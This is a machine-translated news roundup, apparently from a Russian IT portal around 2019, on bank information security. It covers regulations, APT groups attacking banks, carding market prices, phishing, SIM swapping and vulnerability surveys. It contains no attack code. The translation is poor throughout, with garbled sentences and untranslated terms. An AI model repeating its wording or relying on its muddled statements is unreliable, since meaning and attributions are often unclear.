Translated by
2019/11/30 20:46:19

Information security in banks

Fraud on the current accounts not only means use of a complete overdraft limit of the holder of the account, but also often opens doors for the follow-up fraudulent activity. Criminals can use information obtained as a result of successful theft of your personal data for the subsequent frauds with other financial products, such as consumer loans or credit cards.


Losses of banks from cyber crime

Main article: Losses of banks from cyber crime

The policy of the Central Bank in the field of data protection in banks

Main article: The policy of the Central Bank in the field of data protection in a banking system

What standards on information security affect the companies of the financial sector in the Russian Federation?

  • Letter of the Bank of Russia of March 24, 2014 No. 49-T "About recommendations about the organization of use of means of protecting from a malicious code at implementation of banking activity"
  • Provision of the Bank of Russia of June 9, 2012 No. 382-P "About requirements to ensuring data protection at implementation of money transfers …"
  • GOST P 57580.1-2017 "Safety of financial (bank) transactions. Data protection of financial institutions. Basic set of organizational and technical measures".
  • Law on Critical information infrastructure
  • 152-FZ "About personal data"


  • Software No. 1119 'About the approval of security requirements of personal data at their processing in personal data information systems'
  • Provision of the Bank of Russia of August 24 of the 2016th year No. 552-P "About security requirements of information in a payment system of the Bank of Russia"

And also

  • Requirements of FSB (for owners of licenses for cryptography)
  • 63-FZ "About the electronic digital signature"
  • Civil code
  • Criminal code
  • Code of the Russian Federation on Administrative Offences

Directions of the attacks

Fraud with bank cards

Cracking of ATMs


Single Biometric System (SBS)

Main article Single biometric system of identification

Insurance of cyber-risks

Main article Insurance of cyber-risks

Suppliers of technologies of information security for banks

In April, 2019 the analytical center TAdviser issued the "Information Technologies in Bank" card on which it reflected structure of key processes of banking business and noted the IT companies developing products and rendering services for digitalization of these processes. The card covered 270 players of the market – 230 suppliers of the IT products applied to digitalization of basic processes of banking activity and 40 developers of solutions for information security support [1] (more detailed).

The \"Information Technologies in Bank\" card (click to increase)
The "Information Technologies in Bank" card (click to increase)


B of Russia the market of hi-tech crimes in the financial sphere was reduced by 85%

On November 29, 2019 the international company Group-IB submitted the global report on hi-tech crimes of Hi-Tech Crime Trends 2019-2020. Reduction in Russia damage from all types of cybercrimes using harmful the programs directed as directly on banks and led their clients to record decline of the market by 85%. According to Group-IB assessment the market of hi-tech crimes in financial the industry of Russia, was reduced to 510 million rubles for the period of H2 2018 — H1 2019 against 3.2 billion rubles in a previous period. Against the background of the result of financially motivated groupings from the zone "RU", reduction of number Android-trojans and the groups which are engaged phishing the crime amount against clients of banks using social engineering and telephone fraud grows in Russia.

The Group-IB Threat Intelligence command selects 5 groups which carry successfully out target attacks to banks and pose a real threat to the financial sector in the world. Among them "there is a Russian-language three" — Cobalt, Silence and MoneyTaker and also North Korean Lazarus (North Korea) and the SilentCards group from Kenya. Still only Cobalt, Silence and MoneyTaker have trojans which allow to manage a dispenser of the ATM and to withdraw money. At the same time for the studied period via ATMs only hackers of Silence, through card processing - Silence and SilentCards, through SWIFT - Lazarus attacked (2 successful plunders: in India and on Malta for the total amount of 16 million dollars).

The groups attacking banks

Only the North Korean APT group applies FastCash plunder method. It became known at the end of 2018 though it was for the first time used in Asia in 2016. Behind all attacks of this type there is a Lazarus group. Silence reduced activity on own phishing mailings and began to purchase access to target banks at other hacker groups, in particular, at TA505. For November, 2019, SilentCards is the least technically prepared among the specified groups and still successfully makes target attacks only to banks in Africa.

Concerning the Russian banks Cobalt and Silence carried out on one successful attack for the studied period, MoneyTaker – two. The first two Russian-speaking groups switched the focus to the foreign purposes that led to repeated reduction of damage "on RU". According to the report of Group-IB to 93 million rub, i.e. almost by 14 times losses from target attacks to banks in Russia from financially motivated groupings were reduced. In comparison with the last period, the average amount of plunder from target attacks to banks fell in Russia from 118 to 31 million rubles.

According to forecasts of Group-IB "the Russian-language three" will continue geographical expansion out of "RU". For withdrawal of money they will use attacks on the system of card processing and trojans for ATMs. SWIFT will get much less often to focus of these groups. Lazarus will remain the only group which will steal through SWIFT and ATM Switch. Successful attacks to banks will come to the end with an IT infrastructure output out of operation for concealment of traces. Presumably SilentCards will remain the local group attacking banks in the region so far.

Estimating the market of hi-tech crimes in Russia, experts of Group-IB select several segments, in each of which decrease is fixed. On plunders using trojans for PCs which "homeland" was always Russia the damage was reduced by 89% and was 62 million rubles. Russian-speaking hackers ceased to create desktop trojans. There were only two groups which abduct money in Russia using trojans for the PC — Buhtrap2 and RTM. The activity is shown only by the last.

Assessment of a rynok of hi-tech crimes in Russia

Trojans under mobile Android device disappear more slowly, but plunders using it like the malware also on recession: the damage in this segment was 110 million rubles that is 43% lower than a similar indicator in the last period. The number of the groups using Android trojans in Russia was reduced from 8 to 5: at the same time the scene was left by "heavyweights" — trojans on which account the greatest number of fraudulent transactions. The remained groups refused the SMS channel for plunders, it was replaced by card2card translation method that led to increase in the average amount of plunder from 7 to 11 thousand rubles. In general, for the expired period 22 trojans went out of use, it on change created only 7 others.

The damage from a financial phishing in Russia dropped by 65% to the level of 87 million rubles. The general digit was affected both by reduction of number of active groups, and reduction of 'the average check' of the attack. Decrease in a pecuniary benefit led to a pass of 15 groups earning from phishing attacks. Active there were 11.

Decrease in cost efficiency from these types of the attacks, forces swindlers to look for other methods of earnings on data of bank cards. As a result fraud using acceptances of social engineering came out on top on extent of distribution of threat in Russia. First of all, it is about telephone fraud — a vishing which since the end of 2018 literally overflowed the banking market. The behavioural analysis of the user sessions for identification of suspicious activity in the RBS systems is still a prerogative of large banks. For this reason in Russia this type of the attacks on clients of banks will save high dynamics.

The size of the market of karting for the studied period grew by 33% and was more than 56 billion rubles ($879,680,072). The number of the compromised cards which are laid out on underground forums increased 38% from 27.1 up to 43.8 million rather last period. Dump (contents of magnetic bands of cards) make 80% of the market of karting. For the studied period 31.2 million dump on sale were revealed that is 46% higher, than in 2018. Sale of text data (number, CVV, validity period) too on rise, their growth was 19%. The average price rose by text data from 9 to $14, at the same time the average price of a dump — from $33 to $22 fell.

The bottom price is exposed, as a rule, on the compromised data of the American banks, they, on average, go for $8-10 for fresh text these cards and $16-24 for dump. Traditionally high price on cards European banks: $18-21 for the text, $100-120 for a dump. The Russian cards remain a rarity in large kardshopa, the majority of which does not work "on RU". Cards of the Russian banks usually are on average price range, at the same time since the last period the average price for a dump – from $48 considerably grew to $71 (4,500 rub) and the price for the text from $15 to $12 (760 rub) fell a little. At the same time the maximum price for a dump of the card of the Russian bank in 2018 reached $170 (10,000 rub), and in 2019 rose to a mark of $500 (32,000 rub).

The next trend working for increase in volume of text these bank cards on sale of steel JS снифферы. This year experts of Group-IB revealed at least 38 different families JS снифферов, their quantity grows and already exceeds number of bank trojans. In terms of the scope of compromises with help JS снифферов takes the first position the USA, and the second — Great Britain. This threat will be relevant first of all for the countries where the 3D Secure system is not widespread.

The phishing – remains a "long-playing" method about obtaining by swindlers text data on bank cards of users. The competition grows in this segment: attacking began to use panels for management web inzhektami and avtozalivy which were a prerogative of bank trojans earlier. Developers of phishing whales began more attention to pay to self-defense: they use blocking of subnets of vendors on security, hosting companies, give phishing content only from the region IP addresses where there are their victims, redirect on the legitimate websites, check abnormal user-agent.

New Android virus completely terrorized the Russian banks

At the end of November, 2019 it became known of an attack of a new virus to the Russian banks. This trojan is capable to transfer automatically funds through banking mobile applications for operating system Android, experts reported Group-IB. In more detail here.

Russian-speaking hackers ceased to attack banks in the Russian Federation and switched to foreign

Russian-speaking hackers ceased to attack banks in the Russian Federation and switched to foreign credit institutions. At the end of November, 2019 reported about it in Group-IB company in the report Hi-Tech Crime Trends 2019 made based on a research for the second half of the year 2018 and the first half of the 2019th.

According to experts, till 2018 Russian-language hacker groupings attacked banks in Russia and the CIS more often, but then this trend cardinally changed. Cybercriminals "often begin to work in the region: so was with Cobalt, with Silence in Russia and also with SilentCards in Africa".

Russian-speaking hackers ceased to attack banks in the Russian Federation and switched to foreign credit institutions
Russian-speaking hackers ceased to attack banks in the Russian Federation and switched to foreign credit institutions
House" regions for them a test polygon: having fulfilled the equipment, they go further. For example,  the same "the Russian-language three" was focused on the purposes in Asia, Africa, Europe and America  — the representative of Group-IB reported RBC.

Kaspersky Lab confirmed to the edition existence of such trend and noted that hackers are active in less protected countries in Eastern Europe, the CIS, Asia, etc. now.[1]

Specialists pointed to five groupings which, according to them, constitute real danger to banks: three of them (Cobalt, Silence, MoneyTaker) rank as Russian-speaking, two more groups  — North Korean Lazarus and Kenyan SilentCards.

For the 12-month studied period which came to the end in June, 2019, Cobalt and Silence carried out only on one confirmed successful attack to the Russian banks and concentrated on the foreign purposes, as led to repeated reduction of damage from them in the Russian sector, the report says. MoneyTaker attacked two times (in the second case the damage was prevented).

Cobalt robbed the Russian bank in September, 2018, one more attack was undertaken in November. Silence in February, 2019 was succeeded to steal from the Omsk IT bank 25 million rubles, the report says.

Current problems of IT security of banks

Digital transformation increases quality, speed of interaction of consumers of financial services and financial institutions, but at the same time creates additional risks.

As Konstantin Markelov, the Head of Department R&D notes OTR companies, in the credit and financial sphere treat key risks of security:

  • the financial losses of consumers of financial services undermining confidence to modern financial technologies;
  • the financial losses of separate financial institutions capable to make critical impact on their financial position;
  • the violation of operational reliability and continuity of providing financial services resulting in reputation damage and increase of social tension;
  • development of system crisis in case of incidents of information security owing to cyber attacks in the organizations, significant for financial market.

In Russia, according to FinCERT (FINTSERT) of the Bank of Russia, the volume of unauthorized transactions from accounts of legal entities at the end of 2018 was 1.469 billion rubles (in 2017 – about 1.57 billion rubles, in 2016 – about 1.89 billion rubles, in 2015 – about 3.7 billion rubles). "Decrease is available and it is the positive fact", - Konstantin Markelov says.

In the territory of Russia and beyond its limits the volume of unauthorized transactions with use of the payment cards emitted by the Russian credit institutions in 2018 was 1.384 billion rubles (in 2017 – 0.961 billion rubles, in 2016 – 1.08 billion rubles, in 2015 – 1.14 billion rubles). "Here the multidirectional trend is noticeable, and it is bad", - the expert adds OTR.

According to him as digital transformation qualitatively changes technologies of providing financial services, the Bank of Russia at the regulatory level (and each bank – at the level of internal regulations and security policies) should formulate new approaches to information security and cyberstability of a financial system taking into account the following factors:

  • change of architecture of information systems (including use of technologies of the distributed registers);
  • possibility of remote access to financial services and universal use of mobile technologies;
  • use of new perspective technologies for the purposes of information security and cyberstability (Big Data, artificial intelligence, robotization);
  • Internet of Things as element of payment space.

Speaking about problems of IT security of banks, domestic experts most often mention such tasks as need of data protection, fight against fraud and counteraction to the purposeful attacks.

Data security provision

There are more and more systems where many data are collected. Besides data rise in price. Therefore the increasing value is purchased by a problem of security of work with them, but not to the detriment of an opportunity to process them.

As Mikhail Komarov notes, the area director of Informatica in DIS Group company, earlier for data protection access to them was considerably limited. Now it is impossible: such restriction will slow down business development. Therefore access audit and use of data by employees in the organization will amplify. The demand of solutions for intellectual depersonalization of data which on the one hand protect data will grow Besides, with another – save their features and an opportunity to process them.


It is important to note that it will be means as for depersonalization of data in nonindustrial environments, and for depersonalization in real time in the productive systems, - Komarov says.


According to Dmitry Pudov, the deputy CEO for technologies and development of Angara Technologies Group, the relevance of questions of data protection is connected with implementation of a large number of the projects transforming an IT landscape of bank – implementations of analysis systems of Big Data, a roboedvayzing, projects on personalisation of the offers (connected with ML, social mining).


Taking into account transformation of the used approaches and focus on the speed of delivery of the new systems and products, risks of cybersecurity significantly increase in development. And it, in turn, forces banks to consider actively methods and solutions which allow to reach reasonable compromise between risks of cybersecurity and speed of development and an output of new services to the market. Recently we note interest from banks in the following classes of solutions: control facilities of privileged users, safety of containerization, security of Big Data, analysis and security of software open source, - he tells.


Internal fraud

Sergey Kosetsky, the commercial director X-Com, considers that information system protection of large banks is rather high in this connection focus of threats from classical cyber attacks is displaced to a human factor. The certificate to that is a series of the juicy scandals of the last time connected with a personal data leakage of clients of banks from the top ten.

Rustem Mannanov, the expert of the company "ICL Sistemnye of technology", adds that for protection against the unfair employee, it is worth applying the systems of the class User Behavior Analytics. They allow to detect and prevent incidents at early stages. In these solutions such approaches as the scenarios based on rules, predictive technologies, machine learning and detecting of anomalies are used.

Ilya Polessky, the director of business development of DTG (the direction in Lanit group), considers the most burning issue for banks internal security and partner interaction, opening data on core business. According to him, data protection is connected not only with a set of the products unavailable now earlier, but also with abundance of the systems integrated into banking activity.


Notorious human factor — what it is necessary to face at all interoperability layers of financial institution, - he notes.


External fraud

With the permission to use of biometrics of citizens for identification and remote rendering banking services also new types of fraud appeared. For example, malefactors try to take control of "a voice profile" of clients through record of phrases and commands to be identified and get access to transactions with means. Two-factor authentication using phone also gives to swindlers a field for activity — the SIM card or the gadget of the client of bank will give the chance to take control also of its accounts.

Among the main threats it is also possible to select fraud using social engineering. Also fraud cases - as telephone, and using a phishing become frequent. These are attempts of illegal receiving at clients of banks of information concerning their plastic cards.


The solution of the described problems requires implementation of the most different solutions, beginning from masking of data, finishing with various organizational measures, - Maxim Tikurkin, the CEO of System Software company notes.


According to Maria Bar-Biryukovoy, the deputy CEO of Corus Consulting Group, for fight against these threats it is necessary to observe balance of security and convenience – to use automatic monitors, the situational centers, to conduct pro-active work with users and clients.

Counteraction to the purposeful attacks

For the last several years questions of counteraction to the purposeful attacks remain the most current problem. In case of the successful attack of loss can be measured by tens and even hundreds of millions of rubles therefore banks actively invest in modern means of detecting of the attacks at early stages.


Practically all solutions lead to growth of operating costs of information security as means of detecting of signs of cyber attacks require the subsequent operational analysis specialists. It also causes keen interest and investments of banks into creation and development of the centers of cyber security of Security Operations Center (SOC) which are the answer to the increasing requirements of banks to operational efficiency of divisions of cybersecurity, - Dmitry Pudov, the deputy CEO for technologies and development of Angara Technologies Group tells.


According to Pyotr Filatov, the commercial director of Oberon company, the principle of the choice of bank - "victim" is simple: the more business, the is more than attention and potential losses which can be more expensive are more serious. For example, date leaks of users will be to large bank many times more expensive and in money, and reputation: according to information of Sberbank, losses from cyber attacks in our country are about 650 billion rubles annually, at the same time the number of incidents continues to increase.

Checks of the Central Bank of the Russian Federation show that any bank in Russia does not fulfill in full its requirement in the field of information security. In 2018 the Central Bank published the standard which normalizes interaction of banks with FinCERT. As show researches, only 25% of banks in Russia use digital innovations together with cyber security tools. 44% of banks are limited to infrastructure means of protecting.


Participation in such initiatives as the systems of fast payments and "digital profile of the citizen" and also creation of partner ecosystems on the basis of OpenAPI, is demanded from banks of new approaches to ensuring cyber security. It is expected that in the next years for improvement of measures of information security support will be used enciphering, a blockchain, machine learning and analytics. As a result, more than 50% of warnings of security will be automatically processed also in real time based on artificial intelligence. If to glance a little in the future, then for ensuring cyber security the behavioural biometrics and technologies of quantum enciphering of information will be used, - Alexander Rozhkov, the sales director of management of services of Softline Group says.


In Russia the new method of data theft of bank clients appeared

At the beginning of November, 2019 theft of these bank clients knew of a new method in Russia. Malefactors developed the scheme of a corporate phishing which is connected with simulation of testing of staff of credit institutions.

According to Izvestia with reference to Kaspersky Lab, to bank workers sends on e-mail the message with "invitation" to undergo certification. After passing according to the link it suggest to enter the login and the password from working mail therefore cybercriminals can get access to correspondence which can contain files with personal data of clients of banks.

It became known of a new method to theft of these bank clients in Russia.
It became known of a new method to theft of these bank clients in Russia.

The senior content analyst of Kaspersky Lab Tatyana Scherbakova says that the scale of the attacks according to such scheme depends on contents of the cracked e-mail. The first what swindlers can get access to, is a corporate correspondence. And if logins and passwords from databases with personal information about clients or bases are sent in open form, then malefactors will be provided also with them too.

Scherbakova added that Kaspersky Lab learned about a new method of a phishing from the clients.

In division of the Central Bank on cyber security note that a phishing — the first among the pacing factors promoting successful attacks to banks with the purpose to take control of personal data of residents of the country. Often swindlers use human factor when mailing letters to bank employees.

Credit institutions explained to the newspaper that banks quite often provide training and certifications therefore such letters do not cause in employees of suspicions. Besides banks are, as a rule, quite formalized systems therefore communication via e-mail is usual for workers.[2]

Positive Technologies: Technology of APT groupings at attacks to the credit and financial organizations

On October 10, 2019 the Positive Technologies company reported that her experts analyzed tactics and technology of ten APT groupings attacking financial companies in the last two years[3], also found out that each of them resorts to a phishing, and in search of banking systems in network criminals use legitimate utilities for administration and the compromised credentials. Read more here.

The bank botnet Geost infected with 800 thousand Android devices in the Russian Federation

On October 3, 2019 it became known that researchers from the Czech technical university, the National university Kuyo (Argentina) and Avast companies detected one of bank botnets which received the name Geost. The victims of a harmful campaign of steel of at least 800 thousand owners of Android devices in the Russian Federation, in particular malefactors got access to their bank accounts on which several million euros were in total stored. Read more here.

Central Bank: sharply the number of fraudulent calls with substitution of bank numbers grows

On September 27, 2019 it became known of become frequent in Russia of fraudulent calls with substitution of bank number. According to the Central Bank, only in June-August swindlers managed to change about 200 bank numbers.

According to Kommersant, summer of 2019 the Central Bank sent to telecom operators information about more than 2.5 thousand numbers from which calls to the Russian clients arrived. Upon the demand of the finance regulator operators in 218 cases blocked number, in 59 — introduced restrictions for use of financial services, and in 198 — detected substitution of bank number. However more than in two thousand cases no measures were taken due to the lack of a legal basis.

Swindlers began a thicket to call Russians with substitution of bank numbers
Swindlers began a thicket to call Russians with substitution of bank numbers

The share of calls with substitution of bank number to the middle of summer reached 35% of the total number of fraudulent calls, told the deputy director of department of information security of Otkrytiye bank|Ilya Suloyev. Rosbank faced a wave of calls from swindlers at the beginning of July. Alfa-Bank fixed substitution of number too.

The new splash in fraudulent calls was recorded in September, 2019, the first deputy head of department of information security of the Bank of Russia Artem Sychev told the edition. According to him, implementation of technical measures of protection will require also legislative amendments.

Many of the appeals of the Central Bank which arrived in the summer "were technically incorrect", the representative of VimpelCom explained to the edition. According to him, sometimes in lists of numbers provided for blocking those which banks use for outgoing calls to clients were specified. Blocking of such numbers would lead to the fact that banks could not phone to clients, the operator noted.

Statistics of the Central Bank reflects only a small part of a problem, the commercial director of MegaFon Vlad Wolfson said to the edition.[4]

Trend Micro: security in banking sector in the conditions of PSD2

On September 24, 2019 the Trend Micro company provided a research about a status of bank security within the payment directive of European Parliament and European Commission, PSD2. In the research The Risks of Open Banking — Are Banks and their Customers Ready for PSD2? it is told about risks which financial structures should face, and about possible methods of the cybercriminals wishing to use vulnerabilities of the Open Banking system.

Upgraded version of the payment directive of the European union of PSD2 which is also called by Open Banking took effect on September 14, 2019. Providing services of banks of additional opportunities to users and bigger control over the banking data became purpose PSD2. Also the directive gives to the third-party companies which specialize in financial technologies and provide the services to banks and clients, data access of users, equivalent with banks, for their analysis and providing financial recommendations.

In PSD2 which will replace the first version of the directive approved in 2007 specific procedures of data protection, the right and obligation of providers of services and users are more accurately described, and the purpose of the updated directive is stimulation of innovations and the competition in the financial sphere. And though it is developed first of all for EU member states, action and effects of acceptance of PSD2 will extend far for a framework of the European Union. The directive is considered an important step for all industry as it selects full control over client data at banks and grants to users the right to share this information with other financial services providers.

For observance of requirements of PSD2 in the field of security jars are opened by the API to the financial technical-companies (when in these companies necessary infrastructure for data security provision is created and clients agree to transfer of these data). But there is a number of concerns concerning real readiness of banking sector and the financial technical-companies for work in the conditions of PSD2.

Clients who decided to use applications of the Open Banking system for storage of the financial data and management of them enter absolutely new trusted relationships: earlier they disclosed this information to organizations with long-term history and the settled reputation, and now data will be transferred to much less known third-party service providers who have no such experience of fight against fraud. At the same time the systems of protection of banks will begin to obtain less data for training and identification of cases of fraud in real time as financial information of their clients will begin "be sprayed" on several organizations.

In spite of the fact that clients will be better informed on a phishing and methods which are used by cybercriminals for obtaining their data, malefactors will have new opportunities for deception — for example, criminals can call themselves representatives of the financial technical-companies working with banks. Also adoption of the directive for certain will lead to emergence of new phishing schemes.

Banks were more than once noticed in disclosure of personal data of their clients which contained in open form their systems and API in URL. At the same time some financial technical-companies use obviously insufficient security measures and risky methods of data collection, for example, of screen scraping (collecting and the analysis of screen data). Therefore it is very possible that cybercriminals will be able to find vulnerable applications and functions which will try to use right after start of a system.

Information on bank transactions is extremely valuable to malefactors — it helps to reveal behavioural patterns of users, their habits, the schedule and the financial status. Therefore will be ready to pay advertizing agencies which are engaged in spam sending and advertizing of questionable content and also some public institutions connected, for example, with security or investigation for access to such data.

For a year of work the platform of data exchange about cyberthreats helped banks to prevent damage in 8 billion rubles

On August 29, 2019 BI.ZONE company together with Banking association of Russia announced summing up the first year of work of the platform of data exchange about cyberthreats which participants were already about 70 financial institutions. For a year of work the platform helped banks to prevent damage in 8 billion rubles. Read more here.

The bank trojan of Amavaldo uses screenshots for plunder of information

On August 8, 2019 the international anti-virus company ESET reported that it studied a number of bank trojans which attack users of Latin America. Read more here.

Check Point: The number of the attacks on mobile banking increased in the first half of the year twice

On August 1, 2019 the Check Point Software Technologies company issued the report of Cyber Attack Trends: 2019 Mid-Year Report. Hackers continue to develop the new tool kits and methods aimed at corporate data which are stored in cloud infrastructure; personal mobile devices; different applications and even popular mail platforms. Researchers note that any of sectors is completely not protected from cyber attacks. Read more here.

German banks refuse support of authorization by the one-time SMS code

Several German banks announced in July, 2019 plans to refuse use of one-time SMS passwords as a method of authorization and confirmation of transaction. The new legislation of the EU which will come into full force on September 14, 2019 is a reason for refusal of one-time SMS passwords [5].

Handelsblatt reports that Postbank will refuse support of one-time SMS passwords in August, Raiffeisen Bank and Volksbank AG in the fall, and will make by Consorsbank it by the end of 2019. Deutsche Bank and Commerzbank are also going to refuse support, but did not announce terms yet. Other banks, such as DKB and N26, never used this technology, and ING did not make public statements about the plans yet.

In 2015 the EU reviewed the first directive of 2007 on payment services (the rule set regulating online-payments in the EU) and released the upgraded version of PSD 2 requiring implementation of reliable authentication mechanisms of clients.

For the last few years the number of the attacks using the SIM swapping method thanks to which the swindler can deceive the telecom operator and transfer number the user's phone to other SIM card increased, having got access to online-accounts of the user in banks and at the cryptocurrency exchanges.

Specialists of cyber security warn several years against use of one-time SMS passwords, but not because of the attacks by SIM swapping method. The problem consists in the inherent and not giving in to correction shortcomings of the OKS-7 (SS7) protocol which is used for setup of most telephone exchanges worldwide. Vulnerabilities in this protocol allow malefactors to steal imperceptibly the phone number of the user, even without the knowledge of provider, allowing to trace its owner and also to authorize online-payments or requests for login.

Experts in cyber security recommend to use applications authenticators or hardware tokens instead of authentication on the basis of the SMS.

97% of large banks are vulnerable to cyber attacks

On July 10, 2019 it became known that only three banks from hundred received the highest mark as for security of the websites and implementation SSL-enciphering.

The vast majority of large financial institutions of the rating of S&P Global are vulnerable to the hacker attacks. Specialists of the Swiss company ImmuniWeb according to the results of a large-scale research during which 100 websites belonging to large banks, 2,336 subdomains, 102 applications of Internet banking, 55 mobile banking applications and 298 API mobile banking applications were studied came to such conclusion.

Specialists carried out the analysis by a number of criteria, including measures for security, compliance to requirements of the General regulations for data protection of the EU (GDPR), compliance to standards (PCI DSS), use of the outdated and vulnerable software, SSL/TLS enciphering implementation and so forth.

On the websites of 31% of banks vulnerabilities or an incorrect configuration were detected, and 5% of the websites contained the operated known vulnerabilities, and for 13% of resources there was no enciphering or there were operated vulnerabilities. At the same time only for 4% of the websites no problems were revealed.

According to specialists, 40% of applications for Internet banking are subject to vulnerabilities or contain the problems connected with an incorrect configuration, 7% contained the known vulnerabilities, and in 2% of applications there was no enciphering. Safe were only 15% from the total number of the studied applications.

As for compliance to the PCI DSS standards, good results showed 62% of the websites and 58% of applications of Internet banking, and 38% of the websites and 49% of applications - did not undergo testing. In category of compliance to regulations of GDPR the situation is much worse – requirements of regulations observe only 39% of the websites and 17% of applications of Internet banking.

The research also showed that 29% of the websites contain at least one known and uncorrected vulnerability of average or high degree of danger. Among the most widespread vulnerabilities there were XSS vulnerabilities and also problems connected with risk of disclosure of data and incorrect settings.

55% of the studied mobile banking applications were contained by the vulnerabilities opening confidential banking data, 100% of solutions – at least one insignificant vulnerability, 92% - at least one vulnerability of average danger, and 20% of applications were subject at least to one serious vulnerability[6].

Sberbank, VTB, Unicredit and Opening prohibited employees to photograph PC screens

On June 24, 2019 it became known that large banks in Russia prohibited the employees to photograph screens of computers using personal mobile phones.

According to RBC, restrictions are introduced in Sberbank, Unicredit, Otkrytiye bank and VTB.  So,  the Otkrytiye bank prohibits employees to do photo and video filming of screens of monitors, in-house documents, the presentations and client data and also to conduct an audio recording of office negotiations. In  VTB photography on objects of bank is allowed only in coordination with responsible divisions.


Prohibition is explained with the fact that employees quite often photograph personal data of clients that then to sell them in the black market where on them there is demand from swindlers. According to the edition, the price of personal data can vary from 800 to 8000 rubles.

The deputy head of laboratory of computer criminalistics Group-IB Sergey Nikitin explained that swindlers place the declaration in the Darknet to find out card balance of the victim, passport data and another.

According to the expert, the prevalence of photography of screens can be explained with the fact that the companies began to introduce the systems of protection against internal threats and leaks therefore employees just photograph the screen. To prove the fact of photography very hard.

The vice-chairman of Sberbank Stanislav Kuznetsov told that the systems of bank, as a rule, do not allow to transfer service data to a third party, otherwise the case is submitted by police.

The director of the department of information security of FC Otkritie Vladimir Zhuravlev says that banking data can be used in fraudulent schemes using methods of social engineering. For violation of prohibition tough sanctions up to dismissal are provided, he reported.[7]

The resident of Krasnoyarsk Krai abducted funds from someone else's accounts using the malware

In May, 2019 it became known that the staff of department "To" the Ministry of Internal Affairs in the Chuvash Republic identified the personality of the cybercriminal abducting money from someone else's bank accounts using the malware. The 31-year-old resident of Krasnoyarsk Krai who was earlier already brought to trial was the suspect.

According to[8] in May, 2019 the press service of the Ministry of Internal Affairs in the Chuvash Republic, last spring three applications from citizens about theft of means at the same time has come to police stations of the cities of Cheboksary, Novocheboksarsk and Kanash. Neizvestny transferred money from their accounts, but any Sms about the carried-out transactions of the victim did not receive and learned about the incident, having only logged into mobile application. At two citizens the malefactor stole 10 thousand rubles, and inhabitant Kanasha lost 47 thousand rubles.

Specialists of department "To" studied mobile devices of the victims and detected on them the malware blocking messages from bank. The malware got on phones together with the popular messengers downloaded from the unofficial websites.

Concerning the resident of Krasnoyarsk Krai criminal case according to Part 2 of Article 273 of the Criminal Code of the Russian Federation "Creation, Use and Distribution of Harmful Computer Programs" is brought. According to the Ministry of Internal Affairs, earlier he was already brought to trial according to Article 138.1 of the Criminal Code of the Russian Federation "Illicit Trafficking in the Special Technical Means Intended for Secret Obtaining Information".

Now the suspect is under recognizance not to leave. The caused loss to the victims was completely indemnified.

Positive Technologies: All online banks are subject to threat of unauthorized access to a bank secrecy

On April 5, 2019 the Positive Technologies company reported that her experts estimated the level of security of online banks in 2018 and found out that 54% from the inspected systems allow malefactors to steal money, and all online banks are subject to threat of unauthorized access to personal data and a bank secrecy. According to the carried-out analysis, most the studied online banks contain critically dangerous vulnerabilities. As a result of assessment works of security of online banks in each studied system vulnerabilities which can lead to serious effects were detected.

Median number of vulnerabilities in one online bank

The threat of unauthorized access to customer information and bank secrecy, for example to account statements or payment orders of other users, was relevant for each studied online bank, and in some cases vulnerabilities allowed to develop an attack on resources of corporate network of bank. The researches Positive Technologies show that data are included into TOP of the most popular for sale in a darkveba of products. At the same time directly more than 80% in a total amount of on the sale data are the share of a share of credentials and these bank cards. The average cost of data of one user of online bank is 22 US dollars.

Possible effects of the attacks to online banks (share of applications)

During the analysis in 77% of the inspected online banks shortcomings of sale of mechanisms of two-factor authentication were detected. According to the analyst of Positive Technologies Yana Avezova, in some online banks one-time passwords (for example, for authentication) are not applied to crucial actions or have too big validity period. Experts connect it with the fact that banks aim to find balance between security and convenience of using.

Level of security of online banks (share of systems)
Failure even from a part of security measures for benefit of convenience increases risk of commission of fraudulent transactions. If there is no need to confirm transaction with the help of the one-time password, the malefactor does not need access to the mobile phone of the victim any more, and too big password aging increases chance of its successful selection as in the absence of restrictions for selection the one-time password from four characters can be picked up in only a few minutes — the head of group of a research of security of banking systems of Positive Technologies Yaroslav Babin noted.


Contrastive analysis showed that the studied ready-made solutions proposed by vendors contain three times less vulnerabilities, than systems developed by banks independently. And here the amount of vulnerabilities in the productive and test systems evened out: statistically, in 2018 both of these types of systems in most cases contain at least one critically dangerous vulnerability. Experts connect it with the fact that developers, having once tested a system on security, are inclined to postpone the repeated analysis of security after making changes in a program code that inevitably leads to accumulation of vulnerabilities, and over time their number becomes comparable to that which was revealed at primary check.

Reduction of a share of vulnerabilities of the high level of risk in total number of all revealed shortcomings became the main positive trend in security of financial online applications in 2018. According to specialists of Positive Technologies, the share of critically dangerous vulnerabilities decreased twice in comparison with 2017. However in general the level of security of online banks remains low.

Shares of vulnerabilities of different risk level


75% of banks are vulnerable for the attacks by methods of social engineering

On July 5, 2019 the Positive Technologies company provided aggregated data on the main types of the computer attacks in the credit and financial sphere for 2018. The document is prepared by specialists of FINTSERT of the Bank of Russia together with the leading Russian companies in the field of investigation of incidents of information security.

Estimating security of the industry, experts of Positive Technologies noted that three quarters of banks are vulnerable for the attacks by methods of social engineering. In 75% of banks employees follow the links, specified in phishing letters, in 25% — enter the credentials into a false form of authentication; also in 25% of financial institutions at least one employee starts a harmful investment on the working computer. At the same time the phishing at a stage of penetration is used by nine of ten APT groupings.

Also security of internal network of banks is far from perfect. The most frequent problems in a configuration of servers — untimely software updating (67% of banks) and storage of sensitive data in open form (58% of banks). More than in half of the inspected banks dictionary passwords are used. Specialists of Positive Technologies when carrying out penetration tests managed to receive access to control of ATMs from internal network in 25% of banks.

Low is level of security of mobile applications: vulnerabilities of the high level of risk are detected in 38% of applications for iOS and in 43% of applications for platforms running Android. In 76% of mobile applications unsafe data storage which can lead to leaks of passwords, financial information and personal data of users is revealed.

Experts of Positive Technologies emphasize efficiency of APT groupings which quickly apply the appeared opportunities in the activity. So, the Cobalt group carried out harmful mailing in 34 hours from the moment of the publication of information on vulnerability of zero day of CVE-2018-15982. In total this grouping for 2018 executed 61 mailings on the credit and financial organizations in Russia and the CIS countries.

Other APT group — RTM on which account of 59 mailings in 2018 — used as one of command centers domains in the decentralized zone.bit protected from censorship. However features of architecture of a blockchain played against malefactors. Specialists of PT Expert Security Center developed an algorithm of tracking of registration of domains of the RTM grouping (or changes of their IP addresses) that allows to notify banks on the appeared managing servers in a few minutes after the beginning of their use by malefactors (and sometimes and before harmful mailing).

